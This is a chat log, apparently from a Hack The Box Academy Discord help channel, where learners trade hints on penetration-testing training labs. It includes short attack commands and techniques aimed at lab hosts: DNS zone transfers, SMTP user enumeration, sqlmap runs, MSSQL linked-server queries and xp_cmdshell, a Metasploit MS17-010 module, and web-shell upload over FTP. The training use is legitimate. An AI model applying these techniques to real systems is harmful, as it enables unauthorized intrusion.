i can indeed try other things. thank you for the suggestions. But at this time, i need to know why the intended solution isnt working.
I am supposed to create a share on my local system using smbshare.py. This is operational and receives communications from the DC. It just errors out on the winrm side.
any suggestions as to why it's not working would help.
@loud sapphire switch to cmd.exe or change the share
change the share in what way?
@loud sapphire from compdata to another name
so nobody has a hint about where to start for the pwd attacks easy lab?
I haven't got that far yet. sorry dude.
In the Information security foundations path, setting up is above linux fundamentals, but linux fundamentals is pre-requisite for setting up. What should I do first?
can anyone help me with ACTIVE DIRECTORY ENUMERATION & ATTACKS living off the land? I can't seem to find the disabled user
hey! did you manage to get all domain admins? next you could manually check which one of them is disabled
yes can you dm me? i can't dm you
@gloomy tangle @slim plover why yall responding to a question I made two weeks ago lol its all taken care of now.
It's crazy and awesome at the same time, seeing module improvements over time in #858470491676737536
Content remains best and fresh
There's also a general Change Log for modules on the site, where you can see when modules were added/changed
I definitely agree with the sentiment. It's cool to see improvements over time
Indeed
I managed to log into the password attack labs - easy
But I'm a bit clueless as to how to priv esc
can i dm you??
Sure
Any help on Footprinting Lab - Easy? I was able to ssh in with the given account after getting what I needed on the ftp server. However, I am not sure how I should escalate to root. Any hints would be appreciated.
I don't believe you need to escalate
I don't suppose there's a kind soul willing to help me find the name of the hidden 'history' file in the htb-user's home directory, is there? I've been struggling all day with the fundamentals course asking me to perform tasks which seemingly aren't covered in the content before the question.
Ahh, ty, I had been typing 'ls' and 'ls -a' in the home directory to no avail! It is extremely confusing how I'm supposed to find the solution by myself when it's not discussed in the material leading up to the questions at the end of the section. Am I missing something??
Are you in the right directory? htb-user home dir is probably /home/htb-user/. You can check which dir you are in with pwd
i was 'htb-student@nixfund:~$' '~' is his home right? not root home?
Shell & Payloads:Reverse Shells: is it the IP Address of my Pwnbox/Workstation I set as TCPCLIENT address in the code snippet?
yes
You will find that some things are only touched on in a module and they expect you to dig a little deeper into how a tool is used.
Yes. ~ stands for the home dir of the user you are logged in as. Notice htb-student is different from htb-user, and they have different home dirs
Adding onto that, you are logged in as htb-student, and ~ stands for /home/htb-student in this case. You should change your directory to the home dir of the other user (likely /home/htb-user) and then try to view the hidden file
I believe that is correct. You are making a connection back to your attacking machine
When i typed "cd /home/htb-user" I got the error message, "-bash: cd: /home/htb-user/: No such file or directory" I think they were referring to the htb-student as the htb user but idk?
Yeah I've had to google a lot, and use the '-h, --help, apropos & man' commands an awful lot, using the commands feels justified, but having to resort to yt & google feels like straight-up cheating. Guess it's just going to be a LOT harder than I thought.. ty for help!
I'll dm you
Ty, sorry not trying to fill up the chat but I am SO lost it's not even amusing after 8 straight hours of headache!
googling the answers and googling how to use a tool are different. You have to learn how they work really well to fully utilize them in a RW situation. I have been at this for over a year now and am still learning
this is the normal learning cycle for linux stuff so don't feel bad, embrace it because it never ends
learning how to find the relevant information and getting comfortable with that will serve you far more in the long run than any module content
Shell & Payloads:Reverse Shells: when I try to set up a reverse shell in PowerShell I get a very long error message from PowerShell I have no clue about:
Run the command in cmd (command prompt). I say this because it calls powershell at the beginning
Thank You Very Very Much, I have been working on this 3-4 hours with no clue and now you helped me to solve it! You are a True Hero!
Anytime! It's all part of the process. Keep pushing forward and you will continue to see success.
hello I'm new to HTB and wanted to start off with - getting started in cracking into HTB - any tips on if that's a good module to start in or should I do something else to get familiar with HTB
@cursive plover
It can depend on your current knowledge and what you are interested in. Would you say you are familiar with fundamental IT concepts (Basic OS concepts, Linux, Windows and Networking)?
i have an idea of these ,yes. very basic linux command , less on windows and some understanding of networking without having to look at notes if that makes sense
Getting Started would be a good module to start with then.
if I get stuck while doing this are there videos I can follow or any recommendations you have when getting stuck and/or just clueless after reading the whole section
I recommend: if you are stuck take some time to consider what you are trying to accomplish, review the section reading (read it multiple times), ask for help here in the Discord, rely on video walkthroughs as a last resort. I'm sure others in here have some good advice too
thank you , i would appreciate all the advice i can get
Hey guys working on Footprinting - DNS
Question #2 identifying if it's possible to perform a zone transfer. I've read through the zone transfer notes in the section and something isn't quite clicking. Anyone mind breaking it down a little bit for me?
I'm looking at its explanation on Dig-AXFR Zone transfer and it mentions that if "allow-transfer" option is set to any everyone can query the entire zone file.
I feel like this is gonna be real obvious but I'm not quite understanding it and need a slight ELI5 if possible.
i've used ||dig axfr inlanefreight.htb @<IP>|| and I see the information but I guess I dont quite understand how to use this information to determine yes/no on it.
do you get a list of domains or do you get a denied message?
I get a list of domains
then congrats, it's allowed
Ok I am mad confused, I'm doing the Attacking Common Services (SMB) module and I stumbled on the user jason password while working on the previous section for ftp. Now that password apparently was correct as I was able to provide it as an answer. But when I try to use it to connect to the SMB server it won't log me in.
it never says to login via smb as jason
I can't download the private key as anon though
Hey! I'm having problems finding the linked server on attacking common services - hard lab. I found ||fiona, simon, john, patric and julio ||creds. Also I log in via ||rdp with fiona|| creds. I think that's the correct way to find the linked server. Could someone give me a hint please?
why would you
read what the question wants you to do again
before you can find the linked server you must find creds for the mssql server
Yes, I found creds for mssql, I logged in with ||fiona||, impersonated ||John|| and obtained ||julio|| and ||patric|| creds. That's what you mean?
Still stuck on Footprinting - DNS #2
We have confirmed that zone transfer is possible, I'm not understanding how I would go about reading a txt file that is shown.
nslookup and dig both offer ways. Try looking at the man pages
yeah, review the mssql section about linked servers, youre on the right track
not txt file a txt field
Hi all, got a question on Password Attacks module, Pass the Ticket section: How can I get NTLM hashes with Rubeus? Similar to mimikatz "sekurlsa::logonpasswords"
Ok i'm at a total loss, || I know that the 2 users on the client are jason and robin neither passwords mentioned in the hint work for smb. I've tried setting up responder but its radio silence. idk what else to do, i've tried everything they've mentioned on the page. ||
read the final question again, trust me read it aloud if you have to
login via ssh?
I can't it wants a private key
hmm maybe my memory is playing with me then
frankly I'm confused how you'd get his password at all if I hadn't stumbled on it while working the ftp page.
I'm at work right now, give me a little bit and I'll fire up the instance again and see what my memory has forgotten
cause idr a pub key being needed
someone?
Okay. I found the linked server, thank you. Now I'm looking to know how to execute the command that appears on the module because I received a login error
try diff users
I'm using this query ||EXECUTE('select @@servername, @@version, CHANGE_USER, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]||
idr off the top of my head if that looks sane or not
idr?
i dont remember
Yea idk I have to just be missing the worlds most obvious thing but it doesnt add up to me....
I've confirmed that I can perform a zone transfer for inlanefreight.htb but I'm apparently doing it wrong as i've submitted the 3 TXT records shown (none of which are HTB(FLAG)) format
So i must not actually be confirming yes/no on the zone transfer with what I'm trying
if you're getting domains then that means you've got the axfr, the confirming yes/no has nothing to do with your end.
Idr if it's for that one, but at least one of the dns related sections required you to do multiple dns zone transfers with different zones.
so the first zone transfer may have given you a list of domains and some of those could actually be its own zone as well that you need to attempt a transfer on.
@hardy anchor you need to enable xp_cmdshell to execute commands
Yea idk ive read through this so many times
like what the fuck could i be missing lol
Getting connection refused / host unreachable for everything
@low vine vpn problem
|| I found a way to get the private key using smbmap and providing the password I had. That being said I have no idea what the intended way is to get the password. As I wasn't able to bruteforce it at all, if I hadn't found it while brute forcing ftp in the previous section I would still be stuck. Would love to know what the correct route was. ||
||the publicly readable share has password lists that can be used to mini-brute it, which I believe is shared with the ftp server and probably why you found it early||
@low vine maybe download vpn and connect again
Yes. I impersonate ||John||. After that I use ||EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]|| and I received an output with ||"WINSRV02\SQLEXPRESS Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) testadmin 1"||. At this point I can't enable xp_cmdshell
everything being the target ip or everything being the domains/ip listed. Because the latter aren't real devices
@hardy anchor dm me
try impersonating different users
@thorn urchin Ty for the help and all the help you're giving here.
|| I only saw the rsa key in there. ||Honestly one of the most confusing module pages I've worked, which is weird because up to this point smb has felt pretty straightforward.
also my own stupidity made me waste way too long on that lol. Glad someone pointed out VPN ><
maybe my memory is just really bad for that module then lol
it's only vpn if you're getting that error trying against the target IP
time could also be up if you've been at it for awhile and need to reset the target
Am experiencing the same issue now, connected to vfrank and nada, tried to restart, tried to connect the drive from mlefay and reconnect. Interesting thing that it logged me in as Other user and something vfrank ...thank you
I reset it and gave me the answer immediately on what I was trying to do
nice
may I pm anyone regarding the pivoting module?
options
@pastel ginkgo okay just quickly redid that page, its pretty straightforward actually. ||you use the hint for the jason question to get the pw list from the resources section, use that to brute jason to get the pw, then use the pw to login to the GGJ share, and download the id_rsa key||
Weird, when I tried to brute using the resources (even though I knew what the password was) it wouldn't let me log in. I even tried a basic smbclient login and it failed.
wait they update that section?
sure shoot me a dm if you still need help
I used smbclient as well but I didn't use the password on the cmdline, as it has the !@ trap that's annoying to deal with, so I just pasted it in when it asked and logged in just fine
yeah that's what I was trying and it returned auth failure
I'll just chalk it up to my vm acting up
hint: you are impersonating the ||right user|| and you are on the right path; if you still need help with that shoot me a dm
try ||auxiliary/admin/smb/ms17_010_command|| with the command "dir C:\Users\administrator\Desktop"
WEB ATTACKS Page 8 Mass IDOR Enumeration: can some one help me out im having issue with grep in this section.
or the curl command rather...
i ran curl -s http://SERVER_IP:PORT/documents.php?uid=1 | grep <li class="pure-tree_link"> and got nothing back. I've tried several variations of this but i get nothing back. can someone explain what I'm doing wrong?
huh?
what does the -s flag do with curl??...
Dawg, I'm saying tf is y'all tryna damn hack?
?
silent tag
...
try -v
Tracking what? Fuckin' gollum?
this is a learning platform.
@granite radish you lost bro
Then where are the better hackers at?
try twitter
Twitter my ass
anyways if youre not here to discuss the academy modules kindly fuck off
Thanks!
hey @spring tundra can you please get this clown outta here. Thanks
:/
<@&861185840277487616> okay can somebody get rid of this clown then
Im here
thanks
Vick is being a Mc DICK
Solid name.
@thorn urchin where are u from?
Im from thischannelisabouttheacademy
Iβm still getting the same error message though. Iβm not sure I understand since Iβm the root user I should have complete permissions right? Also in a real world setting would a web root have to be placed in /var/www?
π¦
not necessarily, thats just one of the potential default locations
Often yes /var/www/program here/. It depends on the platform etc. Look at the URL once you get past the login and it should help you figure out where dashboard is.
my note on that section is a bit dumb but first I don't think that's where the uid parameter goes, and for the grep command if you want to grep <li class="pure-tree_link"> you need to use | grep '<li class="pure-tree_link">'
or try to \ "
yea that too but i do have some issue with bash and multiple "
hint check the target url, you only have write permission ||in that directory||
the single quote worked thanks. i was a bit confused by the output but the quote helped
oh so the uid parameter is in the right place? i really need to update my note on this module
no... I wouldn't do that... I'm still confused lol
@spring tundra round 2
about to ping 0xjb
You might watch the requests with inspector, under network, or better yet in burp to get a feel for what is going on there as well.
ill do that thanks
yep in my note the uid parameter is a ||jason value||
Sorted
thanks again
nice thanks
won't be shocked if round 3 on an alt though
idk I always wake up to a billion messages because the euros come out when I'm asleep
maybe i just need to login more..
login to these academy modules haha gottem
lol
I have a dumb question about AD that I think I already know the answer to. But in the active directory attacks and enumeration module, it has sections about attacking a parent domain from a child domain.
I presume the reason why there's no section about parent to child is either because if you started in the parent domain and compromised it you already have perms to affect the child domain, or the attacks work perfectly fine both ways and it's just phrased from the child to parent perspective?
I'm having a problem in the Active Directory Enumeration & Attacks module. I keep getting this response when I'm trying to enumerate the IP stating none of the hosts are online and so I have no active host to target:
I've reset the box, I've reset and redownloaded the vpn. I have tried this on two PCs, I have 0 idea what's causing this
maybe they're up but not accepting ping requests?
haven't done that module but pretty common for firewalls or hosts to block ping requests
OHH nvm im dumb. I haven't been doing it inside of the ssh'd network
127.0.0.1
this is expert social engineering just ask um for their I.P brilliant!!
Stuck on the Footprinting Med Lab like a noob @.@, I've reached the remote host (WINMEDIUM), I've scoured the user's filesystem and registry, currently... I need direction, ssms is a no go for me, I have both sa/alex's creds... maybe another set of creds from the regs but I'm not sure
This is day 2 @.@ finally breaking down and askin for tips
Think you need to rdp into the target using alex creds
i have thats where i've been stuck
then you need to access a sql database on the machine using the sql server manager program
yes that's exactly my issue, none of the creds I have are applicable
al,sa, maybe an htb set
ya you need to run the program as administrator using "sa" creds
can i dm you?
then this guide is useful for listing the last 200 entries in the database https://www.patrickkeisler.com/2019/05/management-studio-edit-top-200-rows/
yes
Idk if I'm being dense but in the Enumerating & Retrieving Password Policies section of AD Enumeration and Attacks it says:
"We can also obtain the password policy. We can see that the password policy is relatively weak, allowing a minimum password of 7 characters."
Yet the code output shows min_password_length: 8
Share a screenshot of that in #858470491676737536
Yea i thought of asking here first because i may be wrong, since one of the questions ask this very same thing and the answer isn't 8.
Hi, I'm currently trapped in "Network Enumeration with Nmap" - Medium Lab. The question is: After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.
Could anyone help me? I've tried --source-ports and some NSE scripts, but still does not show the DNS version. Help would be really appreciated
have you tried tcpdump?
yup, and nothing. Basically you want to bypass IDS using source ports. However, I've tried many, many combinations and nothing
you tried going slower
yup, even with -T0
without templates
Hey I was having some issues a while ago... why don't you try to run a scan like the one @thorn urchin suggests and use ||at the same time tcpdump to capture the traffic ||
Or try maybe connecting with ||nc to port 80 using also source-port and capture the traffic on another tab with tcpdump||
double checked, dont need to go slow or use tcpdump
you sure you're scanning the right port
There are 2 filtered ports from the whole sample of ports. Yup, tried with both. Port 53 opens if I use UDP instead of TCP, and source-port 53 as well. I can read the version of that one, but that's not the answer. So it must be the other one that I've been tracking but nothing. I could send you a DM if you want more specifications as well
Yeah if it's a HTB{} version then you are not copying it right ... otherwise since it appears at one time a version that is not HTB{} format then there is something you are missing
I also figured out the manual way to grab the banner without nmap at all. A little silly but kinda fun.
It's supposed to use ncat -nv to get it, in theory
It worked for me with nc -nv too
that sounds painful
my manual way used dig
but just good ole nmap is fine
anyways like I said, you've already done the correct thing from what you've said, likely just copied the answer wrong. my vision's going blurry so I'm just gonna go to bed. good luck
Need slight help on Footprinting - SMTP Last question
Yea sorry was looking back over it but I'm currently using smtp-user-enum -M < > -U <LIST> -t <IP> -w <longer timeout>
and i've not been able to get any sort of confirmed user
Unsure of where I might be fucking up or how I can confirm if I'm doing the process wrong etc
Hold on let me check my notes quickly
But you need to connect to the server for sure
And then use IMAP commands
In the module it explains
@low vine if you can get smtp-user-enum to work for this pls shoot me a dm with how you do it, but I did note down I can't get smtp-user-enum to work so I use ||auxiliary/scanner/smtp/smtp_enum|| in metasploit for that
Yea I had seen mention of using that, was trying to figure out how to do it without
Sorry I confused that one
Can you type your command in spoiler form please?
||smtp-user-enum -M VRFY -U footprinting-wordlist.txt -t <IP> -w 15||
Yup thatβs the one that worked for me
I didn't see it spit anything out, so I just didn't realize I had it and thought I had done something wrong
With ||-w 40|| though
Jesus Christ, so the tool was going too fast?
Haha
I wonder if there is a better way to walk through this process
That took me way too long to figure out ><
That's where learning how to use multiple tools for one thing comes in handy
But you could start using vuln or check the NSE files and search for smtp
I tried the nmap script and didn't get it to work right
Bleh, it's definitely a process. Many more hours of pounding my head to come
I'll give it a shot for fun, but there should be something, imo
Anyway, as you say, it's a process
Just have to keep learning and growing
Hi, could anybody give me a nudge for the Password Attacks lab - medium? I think I'm pretty far along, but I'm stuck now
I've got user d***** but I really don't understand what I'm supposed to do with him
How did you find that user? Just trying to see what part you're at...
Can I DM you?
sure
Hi, is there anybody I can ask about a question of the Linux privilege escalation module?
nvm, I misunderstood the question
How to list all the Windows partitions using Meterpreter?
nvm, it's show_mount
Hello everyone... how to handle a GET parameter secured with uid by using sqlmap?
Should I use --randomize
hello im new
Hello! Can anyone help me with the sqlmap module (Running SQLMap on an HTTP Request)? I'm stuck at the first exercise: What's the contents of table flag2? (Case #2)
I'm using this command : sqlmap -u "http://178.62.106.159:31044/case2.php?id=1" --level 5 --batch -v 3 --dump
but getting only bad requests :(
With sqlmap I like to run the request through Burp and save it as a txt file. With sqlmap you can specify the saved request file with the '-r' flag.
I'm gonna give it a try. Thank you!
Currently doing the same module, I have found all 11 flags, only flag 2 I can't find... If you find it, let me know please
Thank you. I've managed to get the flag
Can I dm you ?
Yes sure
Does anyone else have issues with the ZAP browser and HUD not loading sometimes, freezing?
I keep having to shut it down and restart. It's frustrating.
Wasn't sure where to ask this, and I admit I'm being lazy and not just searching, but what are the policy/rules on doing videos or writeups of any of the Academy modules? Are there ones where it's allowed? Is it a no for all of them?
Hi all I would like a nudge on the LFI skills assessment. Can anyone help out? Thanks
Just use Burp. It's much better imo.
I'm just trying to get through the Web Proxies module
Yeah, I get you. I could never get ZAP working so I did the modules in Burp
I've gotten some things to work, but it just fails a lot.
Has somebody done the Password Cracking module? It's taking ages for me to crack those passwords
Some of them simply do take a while
It's probably the most frustrating module for that reason alone
yea...
If you're stuck on the mutations one, the only advice anyone here can give is find some good TV to watch
Exactly where I'm sitting right now
lol, that one pissed me off, I still remember the password for it
I don't get the point in letting someone brute-force a password for, idk, it's been like 30-45 minutes
and also why SSH, come on...
The one bit of advice I'll give you: ||rather than targeting SSH, target other services that reply faster.||
Jesus, finally found it
good bot
nice try tho
Ditto... saw the same thing as you and @vital adder... ||CME exhausts the list, fails all, msfconsole succeeds with the same list. Since the lesson touches on CME and not msfconsole||, it might be a nice tweak (erratum) to mention ||msfconsole|| somewhere in the class. Many can search here or know of alternatives, but some might think CME is fine and try larger/other lists.
--local-auth fixed it though in CME
Cool... lemme try.
Indeed, it works with --local-auth... good one to add to the notes... ty!
Sorry, wrong tag, I mean this
Thank you both @zealous belfry and @vital adder!!
Attacking Common Services - Easy
How do I transfer a shell to the web server?
Using Burp to modify a POST request with a PHP script?
For Attacking Common Services - Email, do we use their password list? I didn't get any hits on the user and I'm now 40k attempts in on rockyou without a hit yet.
using ftp to upload a file to the web server
I just uploaded the file but couldn't find its location on the web
You do not need to brute-force anything in the lab, if I'm not mistaken
Dig around and you'll find some files that could help you further
It's asking me for a password when I try to connect to the POP/IMAP server when I put in the username?
Oh yeah right, I remember... but anyway, if you brute-force, it should take more than like 5 minutes. As a tip: ||once you find credentials, see if you can exploit the latest FTP vuln||
And also don't use rockyou, use the provided resources as a rule of thumb
Any help on the Footprinting easy lab? I'm in the root directory but I can't find the flag anywhere on the box.
you are in the root dir of what exactly?
That's what I used first and didn't have a hit, I'm still trying to brute-force it. ||I'm trying to log in as marlin||
I honestly do not remember the lab, but check all services; most likely you will find something useful somewhere else, most of the time
Should be in a directory called ||flag||
I only remember that ||you can use the FTP vuln to upload a file onto the web server (e.g. reverse shell?) and for that you need basic auth creds||
In the root directory of the footprinting easy lab box.
So you are already on a machine? Dig around in /home, /root; it should be somewhere there. You can also always use find
I found two files in the FTP... but have tried everything and still couldn't find the hint
I don't have access to the /root directory, but I have access to /. I tried find but I believe the flag is in the /root directory and I'm trying to figure out how to escalate to that.
I could only find two accessible web directories but couldn't find any of my uploaded files in them
maybe upload a file to the directory where the webserver is so you can actually trigger it
Now the question for you is to find that directory
Thanks, but how can I upload it from FTP to a particular web directory?
For Footprinting Easy: ||You don't ever need to get to the root account, just the user's account; the flag is in their home directory||
Take a look at the section where it says latest ftp vuln
Well, I feel dumb lol
Can I have some help with the Attacking Common Applications Skills Assessment 1? I have found a vulnerability for the application, but I'm having trouble using it because it requires fuzzing for a .bat file. I don't really know what wordlist I should be using and I would really appreciate some help.
Any hint to find the directory where the file has been uploaded to?
Hey guys, stuck on Linux Pass the Ticket. I was able to import Julio's ccache file and impersonate him to read files on his remote machine. I can see the flag using smbclient but I'm not sure how to open the file contents. The type command does not work; it seems like I can only list the contents. Any suggestions on how to open the remote file through smbclient?
ffuf is always a good idea
what do you mean? You mean where you have to upload the file to?
I know how to use FFUF. Just having issues specifying the correct wordlist
I uploaded the file. If I upload to http://ip/<file> I always see it in the FTP, but when I try http://ip/../../../<file> the file gets uploaded but I couldn't find its location
Yes, I can't find the location
Hm, actually a good question. You could try to use the SecLists common-php-filenames and strip the .php, or just search for a common filename wordlist on the internet
anything for .bat files?
I'm currently running gobuster using -x php but haven't found anything yet
Yeah, obviously, how would you even access it? You know there is a web server running on 80, so there has to be a directory on the host where the web page is. So if you find that, you can upload a file there and access it on the web. The web page also shows you what is running, so it would be worth googling the document root.
Not sure though, I don't think SecLists has got you on that
\xampp\htdocs\
If you still need help with that, then hint: use one of the ||dirb|| wordlists
use more or get
For some reason whenever I used get <file name> no data was transferred. Of course, when I reset the box and started over it worked fine. Thanks
Working on the POP3/IMAPS module, I got the last answer, but I'm really struggling with "What is the customized version of the POP3 server?"
I can login and am given a version but that seems to not be it
I'm not understanding how I would figure out the customized version
Would love a small hint
Hi
Are you in the Footprinting module IMAP/POP3 section? If so, then hint: use ||nmap||
I am new here
Hello friends
Hi
RIP, now I'm even more confused lol, I had just gone back through that ><
Shoot me a DM, I'll help you with that
Hi guys, I have a stupid problem. Getting Started / Public Exploits on HTB Academy, and I don't know how to read that backup database. I use Metasploit, but where can I read what is in this backup?
DM me with your Metasploit output. If you set the options correctly and Metasploit got the flag, I'll help you with where Metasploit saves the flag
Does anyone have a suggestion on how to pivot onto MS01 in AD Enumeration & Attacks - Skills Assessment Part I? I think I'm missing something obvious. ||I've tried pivoting with Metasploit. But when I tried reverse proxying through the web server, the Meterpreter session just fails. When I try to run two Meterpreter sessions (so I can netcat), the 2nd session dies as it's established.||
Hey, I am in the last section of the Using Web Proxies module. I run ZAP and find that there is a CSP vuln; after reading about it I am not finding a way to get an XSS through. Any tips on this one?
Hi @languid dawn, sorry for the ping, but can you deal with this? I don't want to use the SERIOUS RULE BREAK thing just for spam like this
the Skills Assessment? which question are you on?
I'm working on Using Web Proxies the Zap CSP XSS
Confession... I have been on the nmap module hard lab for 6 hours... do I have a baby brain?
It's called ZAP Scanner, before the skills assessment.
no but maybe a damaged one
So the ZAP Scanner section? Hint: there is no XSS vuln
Yes, that one. Well, the prompt is "Run ZAP Scanner on the target above to identify directories and potential vulnerabilities. Once you find the high-level vulnerability, try to use it to read the flag at '/flag.txt'"
I ran the ZAP scanner report and the only high-ranked vuln is a CSP
@vital adder
the truth hurts
for Content Security Policy missing.
The first time I did that section ZAP didn't find the vuln, I ended up having to find and exploit it manually. Now ZAP still only finds that vuln like half of the time for me
Well, I have a hunch. There is a comment section where there is a link to a ping function
I tried putting a JS alert in there but it's not rendering shit
me too after the ldap module
hint you are on the right path
but it has nothing to do with ||java||
Is this a path traversal vuln?
I was able to get to a devtools path with a ping PHP file
hint ||no||
and this is a bit too much of a spoiler
Shoot me a DM with the ZAP scan output of that directory. I don't have that saved, but I think ZAP did show which vuln it is